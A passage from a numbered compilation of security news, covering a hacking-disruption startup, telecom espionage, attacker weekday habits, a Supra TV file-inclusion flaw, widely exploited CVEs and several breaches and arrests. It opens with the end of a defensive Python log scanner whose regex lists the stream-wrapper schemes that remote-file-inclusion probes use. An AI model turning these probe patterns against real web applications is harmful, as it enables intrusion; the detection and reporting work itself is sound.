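# Apache combined log: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A parameter value naming a remote resource or a stream wrapper is what an RFI
# probe supplies: if the application hands it to include(), the remote content
# is fetched and executed instead of a local template.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp|php|data|expect|phar)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes values, so an encoded "https%3A%2F%2F..." is caught too.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def find_rfi_probes(log_text):
    """Return one finding per query parameter whose value points at a remote resource."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if REMOTE_VALUE_RE.match(value):
                findings.append({
                    "ip": rec["ip"],
                    "ts": rec["ts"],
                    "path": rec["path"],
                    "param": name,
                    "value": value,
                    # A 200 means the app answered the probe; review that handler first.
                    "status": int(rec["status"]),
                })
    return findings


def probes_by_source(findings):
    """Count probes per client address: one address sweeping many parameters is a scanner."""
    return Counter(f["ip"] for f in findings)


# Mitigation on the application side: never build an include path from user input.
# Map the parameter to a fixed set of local files and reject everything else.
ALLOWED_TEMPLATES = {
    "about": "templates/about.html",
    "contact": "templates/contact.html",
}


def resolve_template(name):
    """Return the local file for an allow-listed template name, or None for anything else."""
    return ALLOWED_TEMPLATES.get(name)


if __name__ == "__main__":
    hits = find_rfi_probes(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["path"]} {h["param"]}={h["value"]!r} -> {h["status"]}')
    print("probes per source:", dict(probes_by_source(hits)))
```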
  14. Not long before Tom Bossert was pushed out of his role last year as the White House's top cybersecurity official, a public remark he made at the World Economic Forum in Davos, Switzerland raised eyebrows.

Image: Tom Bossert

Bossert wanted, he said, to introduce policies that would let the US government "get our hands around the necks" of the enemy hackers who cost the US billions of dollars every year. Reporters, and some fellow officials, took the comment a little too literally; after the talk, Bossert found himself explaining that he didn't mean actual, physical violence.

Today, however, Bossert is in business for himself, pitching an approach that's almost as aggressive, if somewhat more subtle: getting his hands around the network communications of enemy hackers, and using that chokepoint to inflict confusion, cost, and (figurative) pain.

After a year largely out of public view, Bossert today revealed his role as cofounder of a startup called Trinity, along with CEO Steve Ryan, a former deputy director of the NSA's Threat Operations Center, and Marie "Neill" Sciarrone, a former BAE exec who served as a cybersecurity advisor to George W. Bush. Backed by $23 million in investment led by Intel Capital, Trinity offers what Bossert describes as a "third way" between traditional cyberdefense and private sectors "hacking back" to play offense.

Instead, Trinity will offer its customers a service that Bossert describes as "active threat interference." It will, essentially, place itself between the company's network and the hackers targeting it, monitoring all incoming and outgoing traffic for signs of foul play. When it finds malicious activity, Trinity promises not merely to alert the customer to the attempted intrusion or to block it, but instead to alter it, messing with the hackers' tools—and their minds. The result, Bossert says, will give hackers a taste of the frustrations and uncertainties that have long plagued defenders.

"If we don’t change the equation to something that actually stops and prevents and imposes cost on the adversary, we’re not going to get in front of the problem," says Bossert. "It’s flat out, I’m-pissed-off time to do it."

Hacking Hacks, Not Hacking Back

Trinity's tricks, the founders claim, include meddling with the authentication between a hacker's command-and-control server and his or her malware, so that the malicious code mysteriously breaks. They can swap the data a hacker steals on its way out of the network, so that it appears valid but can't be read or executed. They can intercept a command sent to a malware implant, and replace it with one that tells the malware to uninstall itself, or swap a response back from the malware to the server with one that tricks the server into beaconing out its location and revealing itself. All of this is intended to foil hackers without ever giving them clear feedback about why they're failing, turning even a simple operation into a drain on time and resources.

"If you’ve got a remote control that doesn’t work, you tap it, then you replace the batteries, then you bang it, then you turn the TV off and back on. But you never stop to believe there's an adversary outside the window interfering with the beam between the remote and TV," says Ryan, who left the NSA two years ago to start work on Trinity before recruiting Bossert six months ago. "If you understand the methods and what makes them successful, you can quite literally reach in and make it not only unsuccessful, but make it even advantage the security team."

That sort of deception and manipulation, the Trinity founders argue, is an opportunity to upend the economics of both criminal and state-sponsored hacking: Intruders can simply try one intrusion method after another until they find one that works, with little penalty for those that don't. But if every intrusion attempt ends in frustration, the offensive advantage in cybersecurity might be blunted, says Trinity president Sciarrone. "When you turn the problem around and focus on the adversaries instead of all the points in your network, the math works for you a little better," she says.

As aggressive as Trinity's tactics might sound, its founders take pains to argue it's not the sort of "active defense" long associated with the even more hawkish practice of hacking back, widely considered too reckless for private sector companies. If you counterattack a hacker's infrastructure to send a message, or to delete a copy of your stolen data, you may well incur a more focused retaliatory attack—not to mention charges under the Computer Fraud and Abuse Act. Even as Congress has reintroduced a bill that would legalize hacking back, cybersecurity experts have warned that it would have disastrous consequences, including collateral damage and a cycle of escalation that costs companies at least as much as the hackers they battle.

Bossert frames Trinity's approach not as counterattacking, but as running stealthy deception and sabotage operations against intruders on the victim's turf. "We don’t need to hack back," says Bossert. "We don’t need to hack the attacker. We need to hack their hack."

An Invisible Hand

Even so, Trinity's tactics are sure to generate criticisms of their own—starting with questions of whether it can live up to its founders' claims. Cleverly interfering with one hacker group's operation represents a very different technical challenge from performing that same interference automatically for thousands of attacks a day across a massive enterprise network. In many cases, hackers' command-and-control communications are end-to-end encrypted, which would likely stymie at least some of Trinity's tricks. And in others, hackers may shrug off their frustration or adapt, particularly if they're going after a high value target.

"My sense is that it’s harder to do than you think. The adversaries are always going to be learning. We can engage them and try to disrupt them, but they work around the damage," says Jay Healey, a senior research scholar at Columbia University's School for International and Public Affairs focused on cyberconflict.

Even worse, Healey warns, would be if the enemy hackers were to detect Trinity's active threat interference, which could lead to the same sort of escalation as hacking back would have. "If you disrupt back, as a company, can you disrupt back enough that you’re too hard a target and the attackers go somewhere else? Or do they decide this is a fight they want to engage in?" Healey asks. "You can get emotions going. It's a status challenge, it’s anger, and it might be seen as escalatory."

For that reason, Trinity's Ryan argues, the company will take pains to do its work invisibly. It will never reveal its customers, or the exact details of its capabilities, he says. And its operations will be carefully designed to hide their interference from the hackers it targets. "We’re never going to send a message back that says, 'Fuck you, try again,'" says Ryan. "In the best case, you want to shape things enough where the real server is responding back with a real answer that the adversary interprets as, 'Shit, it didn’t work.'"

Trinity's cofounders refused to describe some details of the company's technical setup, but they hint that it will avoid detection in part by keeping its hardware entirely off the customer's network, so that even an intruder who breaches a victim network won't be able to find evidence of Trinity's interference or, worse, compromise Trinity's machines themselves. Instead, the company will proxy all of the customer's traffic through an external data center—a rare move among security services, and one that will require its customers to put significant trust in the company as it essentially inspects all of their communications. Bossert admits that Trinity's services require a degree of interception that most companies would never accept from a government agency. "In the American set of values, the government should not do this," Bossert says. "This needed to be a commercial entity."

But Trinity also hints that the service it's selling has been used by the federal government for years in some form, though only to protect Department of Defense computers. Ryan's bio on the Trinity website credits him as having "invented Proactive Threat Interference®, the approach used to reduce the risk of cyber threats to the nation’s military networks." (Whatever form this took, of course, it doesn't seem to have prevented the Pentagon from suffering periodic significant data breaches.) Ryan declined to offer more details, but Bossert adds elliptically that, "we’re going to make this better and commercially available for the first time."

A Middle Path

When Trump appointed Bossert as homeland security advisor in early 2017, former White House security officials from previous administrations described him as "level-headed" and "reasoned," an outlier in an administration populated with extremists, former lobbyists, and neophytes. And Trinity in some sense represents an extension of Bossert's approach in the White House: a focus on punishing adversaries rather than merely defending victims. Bossert led efforts, for instance, to call out the North Korean government hackers responsible for unleashing the WannaCry ransomware worm in May of 2017, and the Russian military hackers who released the destructive NotPetya worm a month later. The White House imposed new sanctions on Russia in response to the NotPetya attack as well as intrusions into the US electrical grid, and the Department of Justice eventually charged one North Korean hacker with criminal hacking related to WannaCry.

"My premise coming in, which I maintained through my entire time there, was to be aggressive, active about attribution," Bossert says of his tenure in the executive branch. "It isn’t for the sake of knowledge alone. It’s for the sake of punitive action when you’ve determined a culprit."

When John Bolton took over as national security advisor in April 2018, another round in the Trump administration's ongoing game of musical chairs, Bossert resigned after a little over a year on the job. Despite his punitive focus on adversaries, he's since criticized National Security Advisor John Bolton's apparent appetite for more aggressive cyberoffense.

With Trinity, Bossert says he sees an opportunity to continue what he describes as a middle path that threads between passive defense and bellicose retaliation. He also just might get rich in the process. "I didn’t leave the White House mad, but I left before I was able to fulfill the mission I wanted to fulfill," Bossert says. "There’s no reason why, in this great country, I can’t go out and do it the old-fashioned way: for profit."

Source
  15. Hackers hit over a dozen mobile carriers and could shut down networks, researchers find

“Hacking a company that has mountains of data that is always updating is the holy grail for an intelligence agency.”

Security researchers found that hackers had infiltrated more than a dozen mobile carriers since 2012. James Martin/CNET

Hackers have quietly infiltrated more than a dozen mobile carriers around the world, gaining complete control of networks behind the companies' backs. The attackers have been using it over the last seven years to steal sensitive data, but have so much control, they could shut down communications at a moment's notice, according to Cybereason, a security company based in Boston.

Security researchers from the company on Tuesday said they've been investigating the campaign it's named Operation Softcell, where hackers targeted phone providers in Europe, Asia, Africa and the Middle East. The hackers infected multiple mobile carriers since 2012, gaining control and siphoning off hundreds of gigabytes of data on people.

It marks a potentially massive breach -- with more fallout still to come -- as companies across different industries struggle with how to protect their customers' data. The hackers also had high-privileged access to do more than steal information.

"They have all the usernames and passwords, and created a bunch of domain privileges for themselves, with more than one user," said Amit Serper, Cybereason's head of security research. "They can do whatever they want. Since they have such access, they could shut down the network tomorrow if they wanted to."

Gigabytes of data theft

Cyberattacks on infrastructure are a national security concern, as hackers have found ways to shut down electrical power grids and access water dams. The US Department of Homeland Security has created its own center for dealing with attacks on infrastructure, which it acknowledged was a frequent target for hackers.

If an attacker shut down phone networks, it could cause massive disruption and communication issues. Serper said he didn't find any US mobile carriers that were affected, but the hacking campaign is ongoing and it's possible that could change.

While they were able to disrupt network signals, the hackers were more focused on espionage than disruption, Cybereason found.

The hackers stole hundreds of gigabytes of call data records, which included sensitive information like real-time geolocation. Cybereason

After gaining access to mobile carriers' internal servers, the hackers would have access to call data records on hundreds of millions of customers. That would provide information like geolocation data, call logs and text message records.

While the hackers had access to millions of people's data, they had only stolen data from fewer than 100 highly targeted victims. The attackers likely targeted high-profile victims involved in government and the military, said Mor Levi, Cybereason's vice president of security practices. That data could update in real time, as long as mobile carriers didn't catch on that they had been hacked.

"Hacking a company that has mountains of data that is always updating is the holy grail for an intelligence agency," Serper said. "It's not just about gaining that access; it's about maintaining it."

How the attacks happened

Cybereason's researchers found that the attackers gained access to more than a dozen mobile carriers by exploiting old vulnerabilities, like malware hidden in a Microsoft Word file or finding an exposed public server belonging to the company.

Once they slipped in, the malware spread by searching for all the computers on the same network and attempting to gain access by flooding them with login attempts. It continued to spread as long as the credentials worked, until the hackers reached the call data records database.

Using that access, the hackers also created accounts for themselves with escalated privileges, essentially hiding among the company's actual staff. Even if the companies take measures to close up their vulnerabilities, the hackers could still remain in the network for years after the fix.

Because the attack method was this sophisticated and targeted, Cybereason researchers believe the hackers were backed by a nation-state. All digital forensics signs point to China -- the malware used, the method of attack and the servers the attacks are on are tied to APT10, China's elite hacking group.

But there's no smoking gun tying the nation-state's hackers to this hacking campaign. Despite the hackers using Chinese malware and servers, it's possible the attacker is a group attempting to frame APT10, researchers said.

"Because the tools that we saw were leaked and are publicly available to anyone who's looking to get those tools, it could be anyone who wants to look like APT10," Levi said.

What to do

Cybereason said it's reached out to all the affected mobile carriers, though it's unclear what fixes they may have implemented to stop the intrusion. Levi recommended that all mobile carriers strictly monitor their internet-facing properties, especially servers. Mobile carriers should also look for accounts that have high privilege access.

Serper said the investigation is ongoing, and he continues to find more companies hacked by this group by the day. The hackers' servers are still up and running, he noted.

For people being tracked through this data theft, there's almost nothing they can do to protect themselves from espionage, he noted. Victims wouldn't even be able to know that their call data records are being stolen from mobile carriers.

"There is no residue on your phone. They know exactly where you are and who you're talking to, and they didn't install any piece of code on your phone," Serper said.

Source
16. Traffic analysis sheds light on weekday habits of attackers such as the most likely day for attacks and how malicious infrastructure is shared.

Do threat actors carry out phases of their attack on different days of the week? Do threats use the same infrastructure for exploitation and control? These may not be the sort of questions that cybersecurity professionals usually think about, but their implications can actually have an important impact on how to better align resources and strategies to detect and defend against attacks.

For the Q1 2019 Threat Landscape Report, threat analysts at FortiGuard Labs were given leeway to roam across the threat landscape they work with daily and share some stories of interest from their cyber threat data that did not necessarily relate to the primary topics or flow of the main report. This quarter, they chose to dig into data from the company's web filtering service. Here is what they found.

What and Why

Weekdays vs weekends. Researchers wanted to see if threat actors conduct phases of their attacks on different days of the week to further demonstrate that cybercriminals are always looking to maximize opportunities. When they compared web-filtering volume from two Cyber Kill Chain phases during weekdays and weekends, they discovered that pre-compromise activity is roughly three times more likely to occur during the work week. This is largely due to the fact that pre-compromise activity requires someone to click on a phishing email or perform some other action, whereas post-compromise activities that rely on command-and-control services do not have this requirement and can occur anytime. Cybercriminals understand this and work to maximize opportunity during the week when Internet activity is taking place.

The web filtering service blocks and then logs attempts to access malicious, hacked, or inappropriate websites. Analysts have applied various categorizations to this activity, like the type of website being sought and the phase of the Cyber Kill Chain in which it occurs. The overwhelming majority of blocks in Q1 occurred in the exploit (initial attack) and control (manipulation of data) phases. This stands to reason, given that devices visiting these malicious URLs are often directed there (e.g. via phishing) for the purpose of exploitation and/or for ongoing command-and-control instructions after successful exploitation. In the figure below, the contrast is clear between pre- and post-compromise activity over the quarter. The blue dots signify weekdays and orange dots weekends.

Every bit of knowledge that can be gained on how attackers work offers at least some improvement over the baseline. In this case, it may make sense to consider differentiating weekday and weekend filtering practices and prioritizing threat discovery activities.

Shared infrastructure. An additional aspect of the web filtering data that researchers found worthy of attention was the degree to which different threats shared infrastructure (namely, URLs). The figure below displays this overlapping infrastructure in a circular network diagram. Each node represents malware or botnet communication activity generated by threats during the control stages of the Kill Chain. The thickness of lines represents the number of domains shared between threats at each stage. The size of each node corresponds to the total volume detected in Q1.

This data fuels several interesting observations. For instance, some threats appear to leverage this community-use infrastructure to a greater degree than unique or dedicated infrastructure. In fact, nearly 60% of all analyzed threats shared infrastructure. IcedID, the #9 threat by volume in the web filter data this quarter, offers a good example of this "why buy/build when you can borrow" behavior. Like so many others, it shared nearly two-thirds of the domains it contacted with other threats. Finally, and perhaps most intriguing: when threats share infrastructure, they also tend to do so within the same stage in the Kill Chain. Similarly, while many different threats may share the same domain during the exploitation phase of an attack, it would be unusual for that threat to leverage a domain for exploitation and then later leverage it for C2 traffic.

Security Tactics for People, Processes and Technology

Attack vectors, like the ones just discussed, underscore the need for organizations to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – and then implementing an intentional layered strategy that uniquely covers all aspects of the network. As IT teams seek to create a layered security environment, there are several tactics they should consider:

People – Training makes the difference between employees being an organization's critical front-line cybersecurity asset or its greatest liability. Employees need to be trained in basic cyber hygiene practices like creating strong passwords, not reusing or sharing those passwords, identifying illicit URLs and email sources, and not clicking links in emails from unknown senders. IT teams can also improve cybersecurity at the employee level with access management policies, such as implementing the principle of least privilege.

Processes – IT security teams should have a cyber incident response plan in place. They should also not only ensure that proper backups are taking place and being stored off-network, but that those backups are regularly being tested. The collection, analysis, and sharing of threat research across teams, devices, and network environments is also critically imperative. Finally, IT teams must know what assets are online, where those assets are, and then be able to prioritize their access to and consumption of resources based on which are most business-critical.

Technology – It's important for IT teams to not implement isolated point solutions as they layer their defenses, but instead choose tools based on their ability to be integrated and automated so they can share real-time threat intelligence. This integrated approach creates a comprehensive solution that can facilitate rapid detection and mitigation of threats across the entire distributed network. Deception technology is another tactic IT teams should make use of. Effective deception strategies make it harder for an adversary to determine which assets are fake and which are real, while tripwires embedded in these false signals increase the ability to detect an intruder. Finally, segmenting corporate networks limits exposure of critical data if there is a breach.

Adapting Security Strategy

Last quarter offered insight into how attackers are currently operating and how they continue to evolve. For example, different stages of their attacks occur on different days, and they tend to share infrastructure. In response, IT security teams can be on the lookout for these activity identifiers and adjust their detection and filtering practices accordingly. It is also clear that building a layered defense approach that factors in people, processes, and technology will minimize the impact of such attacks, even as they continue to evolve.

Source
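The two analyses described in the post above (weekday vs weekend volume per Kill Chain phase, and domains shared between threats within a stage) can be reproduced on your own web-filter block logs. The script below is an added example, not FortiGuard Labs' code; the log format, threat names, domains and dates are constructed to mirror the kind of data the report describes.

```python
"""Weekday/weekend and shared-infrastructure analysis of web-filter block logs.

Added example (not the report's own code). The log format assumed here is
"YYYY-MM-DD <phase> <threat> <domain>", one blocked request per line.
"""
from collections import defaultdict
from datetime import date
from itertools import combinations

# Constructed sample log (not real FortiGuard data). 2019-01-07 is a Monday,
# so the span covers five weekdays and one weekend.
SAMPLE_LOG = """\
2019-01-07 exploit IcedID lure-a.example
2019-01-07 exploit Emotet lure-a.example
2019-01-07 control IcedID c2-a.example
2019-01-08 exploit IcedID lure-b.example
2019-01-08 control Emotet c2-b.example
2019-01-09 exploit Trickbot lure-a.example
2019-01-09 control IcedID c2-b.example
2019-01-10 exploit IcedID lure-c.example
2019-01-10 control Trickbot c2-c.example
2019-01-11 exploit Emotet lure-b.example
2019-01-11 exploit Loki lure-d.example
2019-01-11 control IcedID c2-e.example
2019-01-12 exploit Trickbot lure-c.example
2019-01-12 control Emotet c2-b.example
2019-01-12 control IcedID c2-a.example
2019-01-13 control Trickbot c2-a.example
2019-01-13 control Loki lure-d.example
"""


def parse_log(text):
    """Parse log lines into (date, phase, threat, domain) tuples, skipping blanks."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        day, phase, threat, domain = line.split()
        records.append((date.fromisoformat(day), phase, threat, domain))
    return records


def weekday_weekend_ratio(records, phase):
    """Blocks per weekday vs per weekend day for one phase.

    Returns (weekday_total, weekend_total, ratio of per-day averages). The
    averages are taken over the calendar span of the whole log so that a quiet
    weekend still counts as two days.
    """
    phase_records = [r for r in records if r[1] == phase]
    first = min(r[0] for r in records)
    last = max(r[0] for r in records)
    span = [date.fromordinal(o) for o in range(first.toordinal(), last.toordinal() + 1)]
    n_weekdays = sum(1 for d in span if d.weekday() < 5)
    n_weekend = len(span) - n_weekdays
    weekday_total = sum(1 for r in phase_records if r[0].weekday() < 5)
    weekend_total = len(phase_records) - weekday_total
    weekday_avg = weekday_total / n_weekdays if n_weekdays else 0.0
    weekend_avg = weekend_total / n_weekend if n_weekend else 0.0
    ratio = weekday_avg / weekend_avg if weekend_avg else float("inf")
    return weekday_total, weekend_total, ratio


def domains_by_threat(records, phase):
    """Map each threat to the set of domains it contacted during one phase."""
    out = defaultdict(set)
    for _, ph, threat, domain in records:
        if ph == phase:
            out[threat].add(domain)
    return dict(out)


def shared_edges(records, phase):
    """Edge weights for the network diagram: domains each pair of threats has
    in common within one phase (pairs sharing nothing are omitted)."""
    by_threat = domains_by_threat(records, phase)
    edges = {}
    for a, b in combinations(sorted(by_threat), 2):
        common = by_threat[a] & by_threat[b]
        if common:
            edges[(a, b)] = len(common)
    return edges


def sharing_stats(records, phase):
    """Fraction of threats that share at least one domain, plus for each threat
    the fraction of its own domains that some other threat also used."""
    by_threat = domains_by_threat(records, phase)
    per_threat = {}
    for threat, doms in by_threat.items():
        others = set().union(*(d for t, d in by_threat.items() if t != threat))
        per_threat[threat] = len(doms & others) / len(doms)
    sharing = sum(1 for f in per_threat.values() if f > 0)
    return sharing / len(by_threat), per_threat


def cross_stage_domains(records):
    """Domains seen in more than one Kill Chain phase; the report notes that
    reusing an exploitation domain for C2 is unusual, so these merit a look."""
    phases = defaultdict(set)
    for _, phase, _, domain in records:
        phases[domain].add(phase)
    return {d for d, p in phases.items() if len(p) > 1}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for ph in ("exploit", "control"):
        print(ph, weekday_weekend_ratio(recs, ph))
    print("shared edges (control):", shared_edges(recs, "control"))
    print("sharing stats (control):", sharing_stats(recs, "control"))
    print("cross-stage domains:", cross_stage_domains(recs))
```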
17. I have said it before, and I will say it again — Smart devices are one of the dumbest technologies, so far, when it comes to protecting users' privacy and security. As more and more smart devices are being sold worldwide, consumers should be aware of security and privacy risks associated with the so-called intelligent devices.

When it comes to internet-connected devices, smart TVs are the ones that have evolved the most, giving consumers a lot of options to enjoy streaming, browsing the Internet, gaming, and saving files on the Cloud—technically allowing you to do everything on it as a full-fledged PC. Apparently, in the past few years we have reported how Smart TVs can be used to spy on end users without their explicit consent, how remote hackers can even take full control over a majority of Smart TVs without having any physical access to them, and how flaws in Smart TVs allowed hackers to hijack the TV screen.

Now most recently, Smart TVs selling under the SUPRA brand name have been found vulnerable to an unpatched remote file inclusion vulnerability that could allow WiFi attackers to broadcast fake videos to the television screen without any authentication with the television. SUPRA is a lesser-known Russian electronics brand on the Internet that manufactures several affordable audio-video equipment, household appliances and car electronics, most of which are being distributed through Russian, Chinese and UAE-based e-commerce websites.

Discovered by Dhiraj Mishra and shared with The Hacker News, the vulnerability (CVE-2019-12477) resides in the "openLiveURL" function of the Supra Smart Cloud TV due to lack of authentication or session management. As shown in the PoC URL, the vulnerability could allow a local attacker to inject a remote file in the broadcast and display fake videos without any authentication. As demonstrated by Dhiraj, the exploit allowed him to broadcast a fake "Emergency Alert" while the TV was playing a speech of Steve Jobs—by simply injecting the video file through the PoC URL using his web browser.

Though the requirement that attackers have access to the victim's WiFi network by default limits the threat to a great extent, a growing number of router and IoT vulnerabilities still makes it a potential attack scenario for remote attackers. Though the vulnerability has been given a CVE ID, it is unlikely to be patched. So, users who own a Supra Smart Cloud TV can't do more than keeping their WiFi network secure—like setting a strong password, avoiding sharing the WiFi password with untrusted people and keeping other so-called smart devices connected to the same network behind a firewall or off the Internet.

Source
18. According to Sophos Senior Security Advisor John Shier, organisations are struggling with phishing and other user-focused attacks in India.

NEW DELHI: With more and more Indians going online and generating never-before-seen kinds of data, hackers have turned their focus on a country with over 450 million smartphone users and more than 550 million Internet users. The country has 366 million Internet subscribers in urban locations and 194 million in rural areas, says the latest report by the Telecom Regulatory Authority of India (TRAI).

According to Sophos Senior Security Advisor John Shier, organisations are struggling with phishing and other user-focused attacks in India. "Most people don't believe that computer-based training (CBT) is effective and are looking for ways to improve their defenses against users being tricked into inviting malicious attackers into their network," Shier said in a statement.

A KPMG report in April revealed that nearly 86 per cent of the consumers in India are concerned about eavesdropping of their conversations or theft or misuse of their messages through their devices. "The proliferation of connected and IoT devices will have a cross-sector impact on areas around data security and privacy. In response to this, regulators will need to establish mandatory data security requirements," said Atul Gupta, Leader-IT Advisory and Cyber Security Leader, KPMG in India. Around 87 per cent of the consumers are concerned that retailers will misuse or improperly distribute their information.

According to Gauri Bajaj, Director, Cybersecurity (APAC), Tata Communications, the adoption of cyber security remains a key challenge. "The recent spate of cyber attacks only highlights the security risk that takes place both within and without the organisation. It is imperative that employees are sensitised to the risk of security breaches and trained to respond in such a scenario," Bajaj said.

Not just phones, wearable devices like smartwatches are the next frontier for cyber security. "The future of wearable tech in the world of AI and predictive technology will be highly individualized, data driven and analytics intensive. One of the bigger applications of this will continue to be in the healthcare and fitness sector.

"However, what is key to make this happen is also building a holistic ecosystem that tracks, guides and designs individualized plans for each individual, at a low cost," said Vishal Gondal, CEO and founder of GOQii.

It isn't enough to have an IT security team; having a strong culture around security is the next step in maturity for security awareness programmes, say experts. "Use a unique, complex password for banking and other financial online accounts. For others, use a password manager to keep them organised and readily available. Use Two-Factor Authentication (2FA) when available to provide an extra layer of security on accounts," Shier said.

Be wary of clicking on emails from unknown sources or deals that look too good to be true. Cyber criminals use look-alike spam to lure in victims with links to bogus websites. Businesses should train employees on how to "spot a phish". "Use a layered business security strategy to provide protection at multiple levels to avoid attacks from different angles. Be wary of IoT devices on any network. Change factory default passwords immediately out of the box," the Sophos executive added.

Source
19. These are the top ten security vulnerabilities most exploited by hackers

But one simple thing could help stop the vast majority of these attacks, say researchers.

Security vulnerabilities in Microsoft software have become an even more popular means of attack by cyber criminals - but an Adobe Flash vulnerability still ranks as the second most used exploit by hacking groups. Analysis by researchers at Recorded Future of exploit kits, phishing attacks and trojan malware campaigns deployed during 2018 found that flaws in Microsoft products were the most consistently targeted during the course of the year, accounting for eight of the top ten vulnerabilities. That figure is up from seven during the previous year.

Patches are available for all the flaws on the list - but not all users get around to applying them, leaving themselves vulnerable. Microsoft is the most common target, likely thanks to how widespread use of its software is.

The top exploited vulnerability on the list is CVE-2018-8174. Nicknamed Double Kill, it's a remote code execution flaw residing in Windows VBScript which can be exploited through Internet Explorer. Double Kill was included in four of the most potent exploit kits available to cyber criminals – RIG, Fallout, KaiXin and Magnitude – and they helped deliver some of the most notorious forms of banking trojan and ransomware to unsuspecting victims.

But the second most commonly observed vulnerability during the course of the year was one of only two which didn't target Microsoft software: CVE-2018-4878 is an Adobe Flash zero-day first identified in February last year. An emergency patch was released within hours, but large numbers of users didn't apply it, leaving them open to attacks. CVE-2018-4878 has since been included in multiple exploit kits, most notably the Fallout Exploit Kit which is used to power GandCrab ransomware – the ransomware remains prolific to this day. Adobe exploits used to be the most commonly deployed vulnerabilities by cyber criminals, but they appear to be going off it as we get closer to 2020.

Third in the most commonly exploited vulnerability list is CVE-2017-11882. Disclosed in December 2016, it's a security vulnerability in Microsoft Office which enables arbitrary code to run when a maliciously-modified file is opened – putting users at risk of malware being dropped onto their computer. The vulnerability has come to be associated with a number of malicious campaigns including the QuasarRAT trojan, the prolific Andromeda botnet and more.

Only a handful of vulnerabilities remain in the top ten on a year on year basis. CVE-2017-0199 – a Microsoft Office vulnerability which can be exploited to take control of an affected system – was the most commonly deployed exploit by cyber criminals in 2017, but slipped to the fifth most in 2018. CVE-2016-0189 was the top-ranked vulnerability of 2016 and second ranked of 2017 and still features among the most commonly exploited vulnerabilities. The Internet Explorer zero-day is still going strong almost three years after it first emerged, suggesting there's a real issue with users not applying updates to their browsers.

Applying the appropriate patches to operating systems and applications can go a long way to protecting organisations against some of the most commonly deployed cyber attacks, as can having some intelligence on the potential risks posed by cyber attackers. "The biggest take-away is the importance of having insight into vulnerabilities actively sold and exploited on underground and dark web forums," Kathleen Kuczma, sales engineer at Recorded Future, told ZDNet. "Although the ideal situation would be to patch everything, having an accurate picture of which vulnerabilities are impacting a company's most critical systems, paired with which vulnerabilities are actively exploited or in development, allows vulnerability management teams to better prioritize the most important places to patch," she added.

The only non-Microsoft vulnerability in the list aside from the Adobe vulnerability is CVE-2015-1805: a Linux kernel vulnerability which is often used to attack Android smartphones with malware.

The top ten most commonly exploited vulnerabilities – and the software they target – according to the Recorded Future Annual Vulnerability report are:

CVE-2018-8174 – Microsoft
CVE-2018-4878 – Adobe
CVE-2017-11882 – Microsoft
CVE-2017-8750 – Microsoft
CVE-2017-0199 – Microsoft
CVE-2016-0189 – Microsoft
CVE-2017-8570 – Microsoft
CVE-2018-8373 – Microsoft
CVE-2012-0158 – Microsoft
CVE-2015-1805 – Google Android

Source
20. Ukrainian Police have this week busted two separate groups of hackers involved in carrying out DDoS attacks against news agencies and stealing money from Ukrainian citizens, respectively.

According to the authorities, the four suspected hackers they arrested last week, all aged from 26 to 30 years, stole more than 5 million Hryvnia (around 178,380 USD) from the bank accounts of Ukrainian citizens by hacking into their computers. The suspects carried out their attacks by scanning vulnerable computers on the Internet and infecting them with a custom Trojan malware to take full remote control of the systems. The group then apparently enabled key-logging on the infected computers in an attempt to capture banking credentials of victims when the owners of those infected computers filled in that information on any banking site or their digital currency wallet.

Once they got hold of the victims' banking and financial data, the attackers logged into their online banking accounts and transferred the funds or cryptocurrencies to the accounts controlled by the attackers. Besides stealing money, the suspects also left a backdoor on the victims' computers for further control, so that they could use them in the future for carrying out other illicit activities.

Criminal proceedings against all four people have been initiated under several articles of the Criminal Code of Ukraine, including theft and unauthorized interference with the work of computers, automated systems, computer networks or telecommunication networks.

Two Ukrainian DDoS Hackers Arrested

In a separate press release, Police today announced the arrest of two other hackers, 21 and 22 years old, suspected of performing DDoS attacks against several critical Ukrainian resources, including news sites of the city of Mariupol and several state educational institutions. According to the authorities, the duo developed two DDoS hacking tools which they used to send hundreds of automatic queries to their targeted regional information resources every second, eventually making their service unavailable.

The pair is currently facing up to six years in prison under article 361 of the Criminal Code of Ukraine, which includes unlawful interference with the work of computers, automated systems, computer networks or telecommunication networks.

Source
21. Government says hackers breached 30 computers and stole data from 10.

Hackers have breached the computer systems of a South Korean government agency that oversees weapons and munitions acquisitions for the country's military forces. The hack took place in October 2018. Local press reported this week [1, 2, 3] that hackers breached 30 computers and stole internal documents from at least ten.

The breached organization is South Korea's Defense Acquisition Program Administration (DAPA), an agency that is part of the Ministry of National Defense. It is believed that the stolen documents contain information about arms procurement for the country's next-generation fighter aircraft, according to a news outlet reporting on the cyber-attack.

Reports claim that hackers gained access to the server of a security program installed on all government computers. Named "Data Storage Prevention Solution," the app is installed on South Korean government computers to prevent sensitive documents from being downloaded and saved on internet-connected PCs. According to reports, hackers gained admin access to the software's server and used it to siphon documents from connected workstations.

The country's intelligence agency (NIS, National Intelligence Service) investigated the breach in November and reported its findings to government officials, who disclosed the cyber-attack to the public this week.

Government officials didn't pin the blame on North Korean hackers, as they usually do, although it wouldn't surprise anyone if they did, as North Korea has often launched cyber-espionage and intelligence collection operations against its southern neighbor. For example, in October 2017, South Korea accused North Korea of hacking and stealing the South's secret joint US war plans, which included detailed plans to attack the North in case diplomatic relations deteriorated to a point where military action was needed.

Source
22. A hacker has targeted and released private data on German chancellor Angela Merkel and other senior German lawmakers and officials.

